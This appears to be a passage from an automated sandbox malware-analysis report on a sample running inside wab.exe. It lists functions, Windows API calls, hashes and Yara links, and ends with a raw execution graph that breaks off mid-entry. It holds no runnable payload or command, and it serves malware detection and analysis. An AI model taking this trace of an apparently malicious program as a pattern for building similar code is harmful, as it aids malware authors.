                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 22C94B6C
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,22C94AEA,?,?,22C94A8A,?,22CA2238,0000000C,22C94BBD,00000000,00000000,?,22C92082), ref: 22C94B8F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                • Opcode ID: 5235cb1f5712b2ad441ad124db03136b9279dd43a4abc172e3352a894dcd2b9c
                                                                                                                • Instruction ID: a7a78b0801f6c2d68f04068ff10b33d68f8b6bcb10b7541a46671240b32046f9
                                                                                                                • Opcode Fuzzy Hash: 5235cb1f5712b2ad441ad124db03136b9279dd43a4abc172e3352a894dcd2b9c
                                                                                                                • Instruction Fuzzy Hash: F5F04F35A40308BBDB11AF90C90DFBDBFB9EF44365F0042A5F905B7254DB35A941CA91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C97153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 22C9715C
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 22C9717F
                                                                                                                  • Part of subcall function 22C956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22C95702
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 22C971A5
                                                                                                                • _free.LIBCMT ref: 22C971B8
                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 22C971C7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 336800556-0
                                                                                                                • Opcode ID: da80991b6042edf87893061b9e56bd5ffa31f9175fb226f1d641aca73a36749b
                                                                                                                • Instruction ID: 620e2e24ab880374036c592bf881c74d8daa0380e566505d894211ad0bdaee6b
                                                                                                                • Opcode Fuzzy Hash: da80991b6042edf87893061b9e56bd5ffa31f9175fb226f1d641aca73a36749b
                                                                                                                • Instruction Fuzzy Hash: 1001F7B26033157F27111AB64D8CCBB2A6DDFC2AA43140A39FD08E720CEE649C0689F0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C95B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,22C9636D,22C95713,00000000,?,22C92249,?,?,22C91D66,00000000,?,?,00000000), ref: 22C95B7F
                                                                                                                • _free.LIBCMT ref: 22C95BB4
                                                                                                                • _free.LIBCMT ref: 22C95BDB
                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C95BE8
                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C95BF1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 3170660625-0
                                                                                                                • Opcode ID: cd4de1f92d0bc4800532593dc09854ad75cce5b3242bc6715681d0ae4d938135
                                                                                                                • Instruction ID: ecdf232fd5c5ce65115796a4d1857a081a8cfde5683d012d1a47f6632b7b970f
                                                                                                                • Opcode Fuzzy Hash: cd4de1f92d0bc4800532593dc09854ad75cce5b3242bc6715681d0ae4d938135
                                                                                                                • Instruction Fuzzy Hash: 6A014CF2245701ABD30236355D89E3F3A6E9FC1AF07200224FD16A7185EF3ACA0281A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C91E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,22C910DF,?,?,?,00000000), ref: 22C91E9A
                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 22C91EAC
                                                                                                                • lstrlenW.KERNEL32(?,?,22C910DF,?,?,?,00000000), ref: 22C91EB3
                                                                                                                • lstrlenW.KERNEL32(?,?,22C910DF,?,?,?,00000000), ref: 22C91EC8
                                                                                                                • lstrcatW.KERNEL32(?,22C910DF), ref: 22C91ED3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$lstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 493641738-0
                                                                                                                • Opcode ID: ccb0cb3cf6e8b2e243e2071abb5e0481c35d88abb693a231592e4c0b0cb06477
                                                                                                                • Instruction ID: c4713ac8aeb5d64422f8af1faafcd330febdae8586a6f7f623bc4d6f410abdb9
                                                                                                                • Opcode Fuzzy Hash: ccb0cb3cf6e8b2e243e2071abb5e0481c35d88abb693a231592e4c0b0cb06477
                                                                                                                • Instruction Fuzzy Hash: 89F08936141210BAD7213719ED89E7F777CEFC5B60B040519FA0C931909B946852D2F5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C991B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 22C991D0
                                                                                                                  • Part of subcall function 22C9571E: HeapFree.KERNEL32(00000000,00000000,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?), ref: 22C95734
                                                                                                                  • Part of subcall function 22C9571E: GetLastError.KERNEL32(?,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?,?), ref: 22C95746
                                                                                                                • _free.LIBCMT ref: 22C991E2
                                                                                                                • _free.LIBCMT ref: 22C991F4
                                                                                                                • _free.LIBCMT ref: 22C99206
                                                                                                                • _free.LIBCMT ref: 22C99218
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: f951b620e134b303a1a301133209e93c7ff35e14b5c3dac47296e31e88964e7c
                                                                                                                • Instruction ID: a4584dcf6e9d34b26a62c16e775cb20e511f62622a7e8dcc9db6e01e2cf2bdd8
                                                                                                                • Opcode Fuzzy Hash: f951b620e134b303a1a301133209e93c7ff35e14b5c3dac47296e31e88964e7c
                                                                                                                • Instruction Fuzzy Hash: 30F0F9715647509B8738DE58EBC9C3A7BEAFB607687600C05E909DB504CA29FA808B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C95351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 22C9536F
                                                                                                                  • Part of subcall function 22C9571E: HeapFree.KERNEL32(00000000,00000000,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?), ref: 22C95734
                                                                                                                  • Part of subcall function 22C9571E: GetLastError.KERNEL32(?,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?,?), ref: 22C95746
                                                                                                                • _free.LIBCMT ref: 22C95381
                                                                                                                • _free.LIBCMT ref: 22C95394
                                                                                                                • _free.LIBCMT ref: 22C953A5
                                                                                                                • _free.LIBCMT ref: 22C953B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 8a5a8a7418aa0efd4ca2b80736156994d901d98caf03b265b03d14c519df3819
                                                                                                                • Instruction ID: 68bafc1c501deee33a27e096538f12f05026dbbd0663392561f6e019a5ad7321
                                                                                                                • Opcode Fuzzy Hash: 8a5a8a7418aa0efd4ca2b80736156994d901d98caf03b265b03d14c519df3819
                                                                                                                • Instruction Fuzzy Hash: 43F0F4708B5314DB86219F289DAC4187BF3F724B943110F46FD149B26CD73A4A429B80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C94BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 22C94C1D
                                                                                                                • _free.LIBCMT ref: 22C94CE8
                                                                                                                • _free.LIBCMT ref: 22C94CF2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$FileModuleName
                                                                                                                • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                                                                                                • API String ID: 2506810119-3377118234
                                                                                                                • Opcode ID: df01eeefb83d75fdc82fff5b08fdda18b4fc71d19bc55bbb13f802768833fa5d
                                                                                                                • Instruction ID: f7b43fb6f95bb64e2b4fde6e263f51b35d1157ce27d7925ce07e8bdaf4b7c566
                                                                                                                • Opcode Fuzzy Hash: df01eeefb83d75fdc82fff5b08fdda18b4fc71d19bc55bbb13f802768833fa5d
                                                                                                                • Instruction Fuzzy Hash: DF31B071A40758EFDB21DF99CD84DAEBBFDEF95314F1041A6E904AB240D7718A41CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C986E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,22C96FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 22C98731
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 22C987BA
                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 22C987CC
                                                                                                                • __freea.LIBCMT ref: 22C987D5
                                                                                                                  • Part of subcall function 22C956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22C95702
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                • String ID:
                                                                                                                • API String ID: 2652629310-0
                                                                                                                • Opcode ID: 2e674e9b78ea79df93123cb0944f0c6ce90ad986527a0077ef3abc36d218eae3
                                                                                                                • Instruction ID: 73f1059afd9ce837b0b756e056e62245c7bea6371ad7d6ebdb45c5b051b35438
                                                                                                                • Opcode Fuzzy Hash: 2e674e9b78ea79df93123cb0944f0c6ce90ad986527a0077ef3abc36d218eae3
                                                                                                                • Instruction Fuzzy Hash: 15319E72A0031AABDF158F64CC85EBF7BA5EB84714F410268FD04EB190E73AD951CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C95CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,22C91D66,00000000,00000000,?,22C95C88,22C91D66,00000000,00000000,00000000,?,22C95E85,00000006,FlsSetValue), ref: 22C95D13
                                                                                                                • GetLastError.KERNEL32(?,22C95C88,22C91D66,00000000,00000000,00000000,?,22C95E85,00000006,FlsSetValue,22C9E190,FlsSetValue,00000000,00000364,?,22C95BC8), ref: 22C95D1F
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,22C95C88,22C91D66,00000000,00000000,00000000,?,22C95E85,00000006,FlsSetValue,22C9E190,FlsSetValue,00000000), ref: 22C95D2D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3177248105-0
                                                                                                                • Opcode ID: 6b98549b2786d6e92123bb073eb206bc2220bae60983177d8b589a0b933b381c
                                                                                                                • Instruction ID: af495dfc939ddfaf73d3e086b4cbb94512b33ec7cd0d53b567844e56e54e0ed2
                                                                                                                • Opcode Fuzzy Hash: 6b98549b2786d6e92123bb073eb206bc2220bae60983177d8b589a0b933b381c
                                                                                                                • Instruction Fuzzy Hash: DB01F737641322ABC3115E7D9E4DF667758AF45BE17100B20FE09E7188D734E901CAE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C963F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 22C9655C
                                                                                                                  • Part of subcall function 22C962BC: IsProcessorFeaturePresent.KERNEL32(00000017,22C962AB,00000000,?,?,?,?,00000016,?,?,22C962B8,00000000,00000000,00000000,00000000,00000000), ref: 22C962BE
                                                                                                                  • Part of subcall function 22C962BC: GetCurrentProcess.KERNEL32(C0000417), ref: 22C962E0
                                                                                                                  • Part of subcall function 22C962BC: TerminateProcess.KERNEL32(00000000), ref: 22C962E7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                • String ID: *?$.
                                                                                                                • API String ID: 2667617558-3972193922
                                                                                                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                • Instruction ID: e35f6a62150d6f40c19c08840b477c0637732f315beb25e258c1d206dc97045e
                                                                                                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                • Instruction Fuzzy Hash: 0451BE75E0030AEFDB04DFA8C980ABDBBB5EF99314F24816AD954E7385E6359A01CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C916AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strlen
                                                                                                                • String ID: : $Se.
                                                                                                                • API String ID: 4218353326-4089948878
                                                                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                • Instruction ID: 20e686c08f4b978cd321a6466f3bc27deb05acde198e2e8503d23cd93c05abe3
                                                                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                • Instruction Fuzzy Hash: AD11E7B1A00389AECB11CFA8D841BEEFBFCAF19314F104056E545E7212E6B05B02C765
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C91EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 22C92903
                                                                                                                  • Part of subcall function 22C935D2: RaiseException.KERNEL32(?,?,?,22C92925,00000000,00000000,00000000,?,?,?,?,?,22C92925,?,22CA21B8), ref: 22C93632
                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 22C92920
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                • String ID: Unknown exception
                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                • Opcode ID: ae3293707aa52de4af3e9d6a39bbae0bf120917b1ca64400dc6dc1e89b72b062
                                                                                                                • Instruction ID: 528e90ffc0610e7e4f2fe220ca94a0ca256546734e73163c761a300d4a1f79ba
                                                                                                                • Opcode Fuzzy Hash: ae3293707aa52de4af3e9d6a39bbae0bf120917b1ca64400dc6dc1e89b72b062
                                                                                                                • Instruction Fuzzy Hash: 87F02235A0070DB78B04ABA5EC44DBD736C9F10760B504270EAA4A74A8FBB1EA16C5C2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:6.3%
                                                                                                                Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                Signature Coverage:1.6%
                                                                                                                Total number of Nodes:2000
                                                                                                                Total number of Limit Nodes:78
                                                                                                                execution_graph 40340 441819 40343 430737 40340->40343 40342 441825 40344 430756 40343->40344 40356 43076d 40343->40356 40345 430774 40344->40345 40346 43075f 40344->40346 40358 43034a memcpy 40345->40358 40357 4169a7 11 API calls 40346->40357 40349 4307ce 40350 430819 memset 40349->40350 40359 415b2c 11 API calls 40349->40359 40350->40356 40351 43077e 40351->40349 40354 4307fa 40351->40354 40351->40356 40353 4307e9 40353->40350 40353->40356 40360 4169a7 11 API calls 40354->40360 40356->40342 40357->40356 40358->40351 40359->40353 40360->40356 37671 442ec6 19 API calls 37845 4152c6 malloc 37846 4152e2 37845->37846 37847 4152ef 37845->37847 37849 416760 11 API calls 37847->37849 37849->37846 37850 4466f4 37869 446904 37850->37869 37852 446700 GetModuleHandleA 37855 446710 __set_app_type __p__fmode __p__commode 37852->37855 37854 4467a4 37856 4467ac __setusermatherr 37854->37856 37857 4467b8 37854->37857 37855->37854 37856->37857 37870 4468f0 _controlfp 37857->37870 37859 4467bd _initterm __wgetmainargs _initterm 37860 44681e GetStartupInfoW 37859->37860 37861 446810 37859->37861 37863 446866 GetModuleHandleA 37860->37863 37871 41276d 37863->37871 37867 446896 exit 37868 44689d _cexit 37867->37868 37868->37861 37869->37852 37870->37859 37872 41277d 37871->37872 37914 4044a4 LoadLibraryW 37872->37914 37874 412785 37906 412789 37874->37906 37922 414b81 37874->37922 37877 4127c8 37928 412465 memset ??2@YAPAXI 37877->37928 37879 4127ea 37940 40ac21 37879->37940 37884 412813 37958 40dd07 memset 37884->37958 37885 412827 37963 40db69 memset 37885->37963 37888 412822 37984 4125b6 ??3@YAXPAX 37888->37984 37890 40ada2 _wcsicmp 37891 41283d 37890->37891 37891->37888 37894 412863 CoInitialize 37891->37894 37968 41268e 37891->37968 37988 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37894->37988 37896 41296f 37990 40b633 37896->37990 37901 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37905 412957 37901->37905 37911 4128ca 37901->37911 37905->37888 37906->37867 37906->37868 37907 4128d0 TranslateAcceleratorW 37908 412941 GetMessageW 37907->37908 37907->37911 37908->37905 37908->37907 37909 412909 IsDialogMessageW 37909->37908 37909->37911 37910 4128fd IsDialogMessageW 37910->37908 37910->37909 37911->37907 37911->37909 37911->37910 37912 41292b TranslateMessage DispatchMessageW 37911->37912 37913 41291f IsDialogMessageW 37911->37913 37912->37908 37913->37908 37913->37912 37915 4044cf GetProcAddress 37914->37915 37918 4044f7 37914->37918 37916 4044e8 FreeLibrary 37915->37916 37919 4044df 37915->37919 37917 4044f3 37916->37917 37916->37918 37917->37918 37920 404507 MessageBoxW 37918->37920 37921 40451e 37918->37921 37919->37916 37920->37874 37921->37874 37923 414b8a 37922->37923 37924 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37922->37924 37994 40a804 memset 37923->37994 37924->37877 37927 414b9e GetProcAddress 37927->37924 37929 4124e0 37928->37929 37930 412505 ??2@YAPAXI 37929->37930 37931 41251c 37930->37931 37933 412521 37930->37933 38016 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37931->38016 38005 444722 37933->38005 37939 41259b wcscpy 37939->37879 38021 40b1ab ??3@YAXPAX ??3@YAXPAX 37940->38021 37944 40ad4b 37953 40ad76 37944->37953 38045 40a9ce 37944->38045 37945 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37947 40ac5c 37945->37947 37947->37944 37947->37945 37948 40ace7 ??3@YAXPAX 37947->37948 37947->37953 38025 40a8d0 37947->38025 38037 4099f4 37947->38037 37948->37947 37952 40a8d0 7 API calls 37952->37953 38022 40aa04 37953->38022 37954 40ada2 37955 40adc9 37954->37955 37956 40adaa 37954->37956 37955->37884 37955->37885 37956->37955 37957 40adb3 _wcsicmp 37956->37957 37957->37955 37957->37956 38050 40dce0 37958->38050 37960 40dd3a GetModuleHandleW 38055 40dba7 37960->38055 37964 40dce0 3 API calls 37963->37964 37965 40db99 37964->37965 38127 40dae1 37965->38127 38141 402f3a 37968->38141 37970 412766 37970->37888 37970->37894 37971 4126d3 _wcsicmp 37972 4126a8 37971->37972 37972->37970 37972->37971 37974 41270a 37972->37974 38175 4125f8 7 API calls 37972->38175 37974->37970 38144 411ac5 37974->38144 37985 4125da 37984->37985 37986 4125f0 37985->37986 37987 4125e6 DeleteObject 37985->37987 37989 40b1ab ??3@YAXPAX ??3@YAXPAX 37986->37989 37987->37986 37988->37901 37989->37896 37991 40b640 37990->37991 37992 40b639 ??3@YAXPAX 37990->37992 37993 40b1ab ??3@YAXPAX ??3@YAXPAX 37991->37993 37992->37991 37993->37906 37995 40a83b GetSystemDirectoryW 37994->37995 37996 40a84c wcscpy 37994->37996 37995->37996 38001 409719 wcslen 37996->38001 37999 40a881 LoadLibraryW 38000 40a886 37999->38000 38000->37924 38000->37927 38002 409724 38001->38002 38003 409739 wcscat LoadLibraryW 38001->38003 38002->38003 38004 40972c wcscat 38002->38004 38003->37999 38003->38000 38004->38003 38006 444732 38005->38006 38007 444728 DeleteObject 38005->38007 38017 409cc3 38006->38017 38007->38006 38009 412551 38010 4010f9 38009->38010 38011 401130 38010->38011 38012 401134 GetModuleHandleW LoadIconW 38011->38012 38013 401107 wcsncat 38011->38013 38014 40a7be 38012->38014 38013->38011 38015 40a7d2 38014->38015 38015->37939 38015->38015 38016->37933 38020 409bfd memset wcscpy 38017->38020 38019 409cdb CreateFontIndirectW 38019->38009 38020->38019 38021->37947 38023 40aa14 38022->38023 38024 40aa0a ??3@YAXPAX 38022->38024 38023->37954 38024->38023 38026 40a8eb 38025->38026 38027 40a8df wcslen 38025->38027 38028 40a906 ??3@YAXPAX 38026->38028 38029 40a90f 38026->38029 38027->38026 38033 40a919 38028->38033 38030 4099f4 3 API calls 38029->38030 38030->38033 38031 40a932 38035 4099f4 3 API calls 38031->38035 38032 40a929 ??3@YAXPAX 38034 40a93e memcpy 38032->38034 38033->38031 38033->38032 38034->37947 38036 40a93d 38035->38036 38036->38034 38038 409a41 38037->38038 38039 4099fb malloc 38037->38039 38038->37947 38041 409a37 38039->38041 38042 409a1c 38039->38042 38041->37947 38043 409a30 ??3@YAXPAX 38042->38043 38044 409a20 memcpy 38042->38044 38043->38041 38044->38043 38046 40a9e7 38045->38046 38047 40a9dc ??3@YAXPAX 38045->38047 38049 4099f4 3 API calls 38046->38049 38048 40a9f2 38047->38048 38048->37952 38049->38048 38074 409bca GetModuleFileNameW 38050->38074 38052 40dce6 wcsrchr 38053 40dcf5 38052->38053 38054 40dcf9 wcscat 38052->38054 38053->38054 38054->37960 38075 44db70 38055->38075 38059 40dbfd 38078 4447d9 38059->38078 38062 40dc34 wcscpy wcscpy 38104 40d6f5 38062->38104 38063 40dc1f wcscpy 38063->38062 38066 40d6f5 3 API calls 38067 40dc73 38066->38067 38068 40d6f5 3 API calls 38067->38068 38069 40dc89 38068->38069 38070 40d6f5 3 API calls 38069->38070 38071 